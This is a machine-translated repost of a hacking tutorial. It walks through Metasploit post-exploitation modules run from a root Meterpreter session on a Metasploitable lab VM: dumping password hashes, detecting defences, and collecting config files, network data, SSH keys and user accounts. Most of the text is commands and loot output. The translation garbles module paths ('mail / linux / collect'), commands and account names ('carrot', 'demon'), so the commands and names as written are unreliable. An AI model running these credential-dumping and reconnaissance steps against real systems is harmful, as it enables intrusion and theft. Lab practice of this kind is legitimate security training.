قالب وردپرس درنا توس
Home / Tips and Tricks / How to collect target information quickly with Metasploit Post modules «Null Byte :: WonderHowTo

How to collect target information quickly with Metasploit Post modules «Null Byte :: WonderHowTo



Collecting information after exploitation can be a long and lengthy process, but it is an essential step in attempting to run or to achieve advanced persistence. Every hacker needs to know how to list a goal manually, but sometimes it is worthwhile to automate the process. Metasploit contains post modules that can quickly gather valuable information about a goal, saving both time and effort.

In the previous tutorial we used Metasploit & # 39; s local exploit suggester to get root on the target. To use post modules, a Meterpreter session must be active. These modules can run to a certain extent like any user, but root-level access is ideal because it allows us unlimited access to the system.

What information is most valuable to an attacker?

It has been said that time and time again that reconnaissance is one of the most critical phases of an attack. It not only applies to the initial preparation for an attack, but also to the post-exploitation phase. Successful mining of information after a target has been compromised can lead to longer persistence and exploitation of additional machines.

Some of the most valuable information for an attacker includes things like password hashes, credentials, and other sensitive data that can be misused. Other interesting items are network configurations, system configurations, and standard software configuration files that are likely to be found on the system. Checking which defenses are present, such as antivirus or firewall rules, is also a smart move.

Module 1: Hashdump

Use the sessions to start from the main prompt in Metasploit. command to display the current sessions that are running in the background:

  msf5> sessions

Active sessions
===============

ID Name Type Information Connection
- ---- ---- ----------- ----------
1 scale cmd / unix 10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
2 meterpreter x86 / linux uid = 1, gid = 1, euid = 1, egid = 1 @ metasploitable.localdomain 10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
3 meterpreter x86 / linux uid = 0, gid = 0, euid = 0, egid = 0 @ metasploitable.localdomain 10.10.0.1:4321 -> 10.10.0.50:56950 (10.10.0.50) 

Session 3 is ideal here since it runs as root; this is the Meterpreter session that we obtained in the previous tutorial, but every root session is sufficient.

To view the available mail modules, we can start by typing the full path and quickly pressing Tab to see the auto-completion options:

  msf5> use post / linux / collect /

use mail / linux / collect / check container use mail / linux / collect / enum_network use mail / linux / collect / enum_xchat use mail / linux / collect / openvpn_credentials
use mail / linux / collect / checkvm use mail / linux / collect / enum_protections use mail / linux / collect / gnome_commander_creds use mail / linux / collect / phpmyadmin_credsteal
use post / linux / gather / ecryptfs_creds use post / linux / gather / enum_psk use post / linux / gather / gnome_keyring_dump use post / linux / gather / pptpd_chap_secrets
use post / linux / gather / enum_commands use post / linux / gather / enum_system use post / linux / gather / hashdump use post / linux / gather / tor_hiddenservices
use post / linux / collect / enum_configs use post / linux / collect / enum_users_historie use post / linux / collect / mount_cifs_creds 

The first one we will try is the hashdump module; this dumps the password hashes for all users on the system, which can then be attempted to crack. Although we already have root on this machine, other credentials can often be used to run around the network.

Load the module with the command use :

  msf5> use post / linux / collect / hashdump 

We can then look at the options for this mail module:

  msf5 post (linux / gather / hashdump)> options

Module options (post / linux / collect / hashdump):

Name Current setting Required Description
---- --------------- -------- -----------
SESSION yes The session to execute this module. 

The only thing we have to set is the session to do this. Use the command set and the correct session number:

  msf5 post (linux / gather / hashdump)> set session 3

session => 3 

Then type run to start it:

  msf5 post (linux / gather / hashdump)> run

[+] root: $ 1 $ / avpfBJ1 $ x0z8w5UF9Iv. / DR9E9 Member: 0: 0: root: / root: / bin / bash
[+] sys: $ 1 $ fUX6BPOt $ Miyc3UpOzQJqz4s5wFD9l0: 3: 3: sys: / dev: / bin / sh
[+] klog: $ 1 $ f2ZVMS4K $ R9XkI.CmLdHhdUE3X9jqP0: 103: 104 :: / home / klog: / bin / false
[+] msfadmin: $ 1 $ XN10Zj2c $ Rt / zzCW3mLtUWA.ihZjA5 /: 1000: 1000: msfadmin ,,,: / home / msfadmin: / bin / bash
[+] postgres: $ 1 $ Rw35ik.x $ MgQgZUuO5pAoUvfJhfcYe /: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
[+] user: $ 1 $ HESu9xrH $ k.o3G93DGoXIiQKkPmUgZ0: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash
[+] service: $ 1 $ kR3ue7JZ $ 7GxELDupr5Ohp6cjZ3Bu //: 1002: 1002: ,,,: / home / service: / bin / bash
[+] Unshadowed password file: /root/.msf4/loot/20190619120310_default_10.10.0.50_linux.hashes_719586.txt
[*] Post module execution completed 

We can now see the hashes for all users on the system and it even writes this information to a file for us.

Module 2: Checkvm

The next module we will try is the module checkvm ; this attempts to determine whether the target is a virtual machine or not, which can be useful information for specific exploits or attack vectors.

Load the module:

  msf5 post (linux / gather / hashdump)> use post / linux / gather / checkvm 

And view the options:

  msf5 post (linux / gather / checkvm)> options

Module options (mail / linux / collection / checkvm):

Name Current setting Required Description
---- --------------- -------- -----------
SESSION yes The session on which this module is executed. 

Again, we just need to set a session number for this module to work. Since our session number will not change, we can use the setg command to globally set the option. That way we don't have to keep typing the same thing.

  msf5 post (linux / gather / checkvm)> setg session 3

session => 3 

Type run to kick it off:

  msf5 post (linux / gather / checkvm)> run

[*] Collecting system information ....
[+] This looks like a virtual machine from & # 39; VirtualBox & # 39; to be
[*] Post module execution completed 

We can see that it determines that the target appears to be a VirtualBox virtual machine.

Module 3: enum_protections

The next one we will try is the enum_protections module; this attempts to find certain programs on the target that can be used to detect an attack, such as antivirus, firewalls, IDS / IPS, network sniffing software and others.

Load the module:

  msf5 post (linux / collect / checkvm)> use post / linux / collect / enum_protections 

Because we set the session option worldwide earlier, it is already set for us when we go to look at the options:

  msf5 post (linux / collect / enum_protections)> options

Module options (post / linux / collect / enum_protections):

Name Current setting Required Description
---- --------------- -------- -----------
SESSION 3 yes The session to execute this module. 

All we have to do now is execute the module:

  msf5 post (linux / gather / enum_protections)> execute

[*] Running module at 10.10.0.50 [metasploitable]
[*]   Info:
[*] _ _ _ _ _ _ ____ _ __ ___ ___ | | _ __ _ ___ _ __ | | ___ (_) | _ __ _ | | __ | | ___ | ___  | & # 39; _ `_  / _  __ / _` / __ | & # 39; _  | | / _  | | __ / _` | & # 39; _  | | / _  __) || | | | | | __ / || (_ |  __  | _) | | (_) | | || (_ | | | _) | | __ // __ / | _ | | _ | | _ |  ___ |  __  __, _ | ___ / .__ / | _ |  ___ / | _ |  __  __, _ | _.__ / | _ |  ___ | _____ | | _ | Warning: never expose this VM to an untrusted network! Contact: msfdev [at] metasploit.comLogin with msfadmin / msfadmin to start
[*] Linux metasploitable 2.6.24-16 server # 1 SMP Thu 10 April 13:58:00 UTC 2008 i686 GNU / Linux
[*] Searching for security systems ...
[+] ASLR is enabled
[*] Find installed applications ...
Ufw found: / usr / sbin / ufw
[+] iptables found: / sbin / iptables
[+] logrotate found: / usr / sbin / logrotate
[Tcpdump found: / usr / sbin / tcpdump
[+] AA status found: / usr / sbin / aa status
[*] Post module execution completed 

We can see that this time it gives us a banner, although it is a bit inconsistent and information about any system security is present. It appears that some firewall software has been found, tcpdump and ASLR are enabled; this type of information can be very valuable when preparing an attack.

Module 4: enum_configs

The next module that we try is the module enum_configs ; attempts to find configuration files for commonly used software. Although this information could be found manually, the module makes it easy to collect everything quickly in one go.

Load the module:

  msf5 post (linux / gather / enum_protections)> use post / linux / gather / enum_configs 

And run it:

  msf5 post (linux / gather / enum_configs)> execute

[*] Running module at 10.10.0.50 [metasploitable]
[*]   Info:
[*] _ _ _ _ _ _ ____ _ __ ___ ___ | | _ __ _ ___ _ __ | | ___ (_) | _ __ _ | | __ | | ___ | ___  | & # 39; _ `_  / _  __ / _` / __ | & # 39; _  | | / _  | | __ / _` | & # 39; _  | | / _  __) || | | | | | __ / || (_ |  __  | _) | | (_) | | || (_ | | | _) | | __ // __ / | _ | | _ | | _ |  ___ |  __  __, _ | ___ / .__ / | _ |  ___ / | _ |  __  __, _ | _.__ / | _ |  ___ | _____ | | _ | Warning: never expose this VM to an untrusted network! Contact: msfdev [at] metasploit.comLogin with msfadmin / msfadmin to start
[*] Linux metasploitable 2.6.24-16 server # 1 SMP Thu 10 April 13:58:00 UTC 2008 i686 GNU / Linux
[+] apache2.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt
[+] ports.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_670485.txt
[-] Cannot open file: /etc/nginx/nginx.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/snort/snort.conf: core_channel_open: operation failed: 1
[+] my.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_055449.txt
[+] ufw.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_162601.txt
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_122073.txt
[-] Could not open file: /etc/security.access.conf: core_channel_open: operation failed: 1
[+] shells stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_678197.txt
[-] Cannot open file: /etc/security/sepermit.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/ca-certificates.conf: core_channel_open: operation failed: 1
[+] access.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_706115.txt
[-] Cannot open file: /etc/gated.conf: core_channel_open: operation failed: 1
[+] rpc saved in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_755377.txt
[-] Cannot open file: /etc/psad/psad.conf: core_channel_open: operation failed: 1
[+] debian.cnf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_345601.txt
[-] Cannot open file: /etc/chkrootkit.conf: core_channel_open: operation failed: 1
[+] logrotate.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_800174.txt
[-] Cannot open file: /etc/rkhunter.conf: core_channel_open: operation failed: 1
[+] smb.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_570254.txt
[+] ldap.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_677851.txt
[-] Cannot open file: /etc/openldap/openldap.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/cups/cups.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: operation failed: 1
[+] sysctl.conf stored in /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_441838.txt
[-] Cannot open file: /etc/proxychains.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/cups/snmp.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/mail/sendmail.conf: core_channel_open: operation failed: 1
[-] Cannot open file: /etc/snmp/snmp.conf: core_channel_open: operation failed: 1
[*] Post-module execution completed 

We can see it found all kinds of things, such as an Apache configuration, sysctl, smb and others. It also stores each of these files in a folder for later use. For example, we can view the Apache configuration by catting the full path of the file:

  msf5 post (linux / gather / enum_configs)> cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051. text

[*] exec: cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt

#
# Based on the NCSA server configuration files originally from Rob McCool.
#
# This is the main file of the Apache server configuration. It contains the
# configuration guidelines that instruct the server.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the guidelines.
#
# Do NOT read the instructions here without understanding
# what they do. They are only here as hints or memories. If you are not sure
# consult the online documents. You have been warned.
#
# The configuration guidelines are grouped in three basic sections:
# 1. Guidelines that manage the operation of the Apache server process as one
# whole (the & # 39; global environment & # 39;).
# 2. Guidelines defining the parameters of the & # 39; main & # 39; or & # 39; standard & # 39; define server,
# that responds to requests that are not handled by a virtual host.
# These guidelines also provide default values ​​for the settings
# of all virtual hosts.
# 3. Settings for virtual hosts, with which web requests can be sent
# different IP addresses or host names and let them be treated by the
# the same Apache server process.
#
# Configuration and log file names: as the file names you specify for many
# of the server drivers start with "/" (or "drive: /" for Win32), the
# server uses that explicit path. If the file names * do not * begin
# with "/", the value of ServerRoot is preceded - so "/var/log/apache2/foo.log"
# with ServerRoot set to "" is interpreted by the
# server as "//var/log/apache2/foo.log".
#

... 

Module 5: enum_network

The next module that we will implement is the enum_network module; this will collect all network-related information about the target, such as IP addresses, routes, open ports, SSH configs and DNS information.

Load the module:

  msf5 post (linux / gather / enum_configs)> use post / linux / gather / enum_network 

And run it:

  msf5 post (linux / gather / enum_network)> execute

[*] Running module against metasploitable.localdomain
[*] Module runs as root
[+] Info:
[+] _ _ _ _ _ _ ____ _ __ ___ ___ | | _ __ _ ___ _ __ | | ___ (_) | _ __ _ | | __ | | ___ | ___  | & # 39; _ `_  / _  __ / _` / __ | & # 39; _  | | / _  | | __ / _` | & # 39; _  | | / _  __) || | | | | | __ / || (_ |  __  | _) | | (_) | | || (_ | | | _) | | __ // __ / | _ | | _ | | _ |  ___ |  __  __, _ | ___ / .__ / | _ |  ___ / | _ |  __  __, _ | _.__ / | _ |  ___ | _____ | | _ | Warning: never expose this VM to an untrusted network! Contact: msfdev [at] metasploit.comLogin with msfadmin / msfadmin to start
[+] Linux metasploitable 2.6.24-16 server # 1 SMP Thu 10 April 13:58:00 UTC 2008 i686 GNU / Linux
[*] Collecting data ...
[+] Network configuration stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt
[+] Route table stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_402588.txt
[+] Firewall configuration stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_273816.txt
[+] DNS configuration stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_884409.txt
[+] SSHD config saved in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_100280.txt
[+] Host file stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_071264.txt
[+] SSH keys stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_372706.txt
[+] Active connections stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_029831.txt
[+] Wireless information stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_821137.txt
[+] Listening ports stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_676900.txt
[+] If-Up / If-Down stored in /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_258463.txt
[*] Post module execution completed 

We can see that it has collected an abundance of network information, all of which may be useful to an attacker. For example, we can view the network configuration file:

  msf5 post (linux / gather / enum_network)> cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

[*] exec: cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt

eth0 Link encap: Ethernet HWaddr 08: 00: 27: 77: 62: 6c
inet addr: 10.10.0.50 Bcast: 10.10.0.255 Mask: 255.255.255.0
inet6 addr: fe80 :: a00: 27ff: fe77: 626c / 64 Scope: Link
UP TUNING CURRENT MULTICAST MTU: 1500 Metric: 1
RX packages: 2643 errors: 0 cases: 0 exceedances: 0 frame: 0
TX packets: 2139 errors: 0 cases: 0 exceedances: 0 carrier: 0
collisions: 0 txqueuelen: 1000
RX bytes: 2268520 (2.1 MB) TX bytes: 361635 (353.1 KB)
Base address: 0xd010 Memory: f0000000-f0020000

lo Link encap: Local loopback
inet addr: 127.0.0.1 Mask: 255.0.0.0
inet6 addr: :: 1/128 Scope: Host
LOOPBACK UP RUNNING MTU: 16436 Metric: 1
RX packages: 325 errors: 0 cases: 0 overruns: 0 frame: 0
TX packets: 325 errors: 0 cases: 0 exceedances: 0 carrier: 0
collisions: 0 txqueuelen: 0
RX bytes: 125465 (122.5 KB) TX bytes: 125465 (122.5 KB) 

Module 6: enum_system

The last module that we are handling today is the module enum_system ; collects system information about the target, including Linux version, installed packages, active services, cron tasks, and user accounts. Again, these are all things that can be found manually, but sometimes it makes more sense to have it all done for you.

Load the module:

  msf5 post (linux / gather / enum_network)> use post / linux / gather / enum_system 

And run it:

  msf5 post (linux / gather / enum_system)> execute

[+] Info:
[+] _ _ _ _ _ _ ____ _ __ ___ ___ | | _ __ _ ___ _ __ | | ___ (_) | _ __ _ | | __ | | ___ | ___  | & # 39; _ `_  / _  __ / _` / __ | & # 39; _  | | / _  | | __ / _` | & # 39; _  | | / _  __) || | | | | | __ / || (_ |  __  | _) | | (_) | | || (_ | | | _) | | __ // __ / | _ | | _ | | _ |  ___ |  __  __, _ | ___ / .__ / | _ |  ___ / | _ |  __  __, _ | _.__ / | _ |  ___ | _____ | | _ | Warning: never expose this VM to an untrusted network! Contact: msfdev [at] metasploit.comLogin with msfadmin / msfadmin to start
[+] Linux metasploitable 2.6.24-16 server # 1 SMP Thu 10 April 13:58:00 UTC 2008 i686 GNU / Linux
[+] Module runs as a "root" user
[*] Linux version stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_406677.txt
[*] User accounts stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt
[*] Installed packages stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_051826.txt
[*] Ongoing services stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_438719.txt
[*] Cron tasks stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_890911.txt
[*] Disk information stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_036761.txt
[*] Log files saved in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_749148.txt
[*] Setuid / setgid files stored in /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_378666.txt
[*] Post-module execution completed 

We can see that it has discovered valuable system information. For example, we can view all user accounts on the system:

  msf5 post (linux / gather / enum_system)> cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

[*] exec: cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt

carrot
demon
bin
sys
synchronize
spell
man
lp
mail
news
uucp
proxy
www data
backup
list
irc
mosquitoes
no one
libuuid
dhcp
syslog
Klog
sshd
msfadmin
tie
postfix
ftp
postgres
mysql
Tomcat55
distccd
user
service
telnetd
proftpd
statd 

Wrapping

Today we have investigated some post modules from Metasploit to collect valuable information about the goal. We have discussed modules to check which protections are present and whether the system is a VM or not, modules to discover network and general software configuration information, and even a module to dump password hash. Although all this information can be collected manually, Metasploit makes work quick and painless.

Save BIG this holiday weekend with our favorite Black Friday deals for smartphones, headphones, chargers, accessories, TV & # 39 ; s and more

Cover image by Soumil Kumar / Pexels; Screenshots of drd_ / Null Byte

Source link